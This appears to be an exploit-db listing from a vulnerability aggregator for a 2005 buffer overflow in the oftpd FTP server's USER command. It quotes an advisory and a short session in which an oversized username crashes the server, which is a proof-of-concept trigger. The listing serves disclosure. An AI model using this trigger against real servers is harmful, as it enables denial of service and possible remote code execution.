Lucene search

K
exploitdb[email protected]EDB-ID:25943
HistoryJul 06, 2005 - 12:00 a.m.

OFTPD 0.3.x - User Command Buffer Overflow

2005-07-0600:00:00
www.exploit-db.com
76

AI Score

7.4

Confidence

Low

EPSS

0.01

Percentile

84.0%

source: https://www.securityfocus.com/bid/14161/info

oftpd is prone to a remotely exploitable buffer overflow. This may be triggered by a client through an overly long argument for the USER command.

Successful exploitation may let a remote attacker execute arbitrary code in the context of the server process. 

530 Only anonymous FTP supported.
ftp: Login failed.
ftp> user
(username)
usage: user username [password [account]]
ftp> user \0\0\0\0\0\ (much larger string)
500 Syntax error, command unrecognized.
Login failed.
ftp> user
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x30303054
0x969b56d8 in history ()

AI Score

7.4

Confidence

Low

EPSS

0.01

Percentile

84.0%

Related for EDB-ID:25943